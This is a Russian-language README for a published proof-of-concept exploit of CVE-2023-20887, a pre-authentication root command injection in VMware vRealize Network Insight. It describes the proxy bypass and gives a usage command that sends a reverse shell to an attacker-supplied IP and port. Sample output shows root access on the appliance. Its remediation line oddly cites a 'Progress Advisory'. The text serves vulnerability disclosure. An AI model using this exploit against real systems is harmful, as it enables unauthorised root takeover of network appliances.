
VMWare vRealize Network Insight — удалённое выполнение кода до аутентификации (CVE-2023-20887)
POC для CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) неаутентифицированное RCE
Анализ первопричины уязвимости можно найти в моём блоге: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

VMWare Aria Operations for Networks (vRealize Network Insight) подвержен внедрению команд при приёме пользовательского ввода через интерфейс Apache Thrift RPC. Эта уязвимость позволяет удалённому неаутентифицированному злоумышленнику выполнять произвольные команды в операционной системе под пользователем root. Интерфейс RPC защищён обратным прокси, который можно обойти. VMware оценила серьёзность этой проблемы как критическую с максимальной базовой оценкой CVSSv3 9.8. Злоумышленник может получить удалённое выполнение кода с правами 'root' на устройстве. Уязвимы версии VMware 6.x.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Обновитесь до последней версии или примите меры, следуя инструкциям в Progress Advisory
Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты и не предназначено для использования против систем, кроме случаев явного разрешения. Сопровождающие проект не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.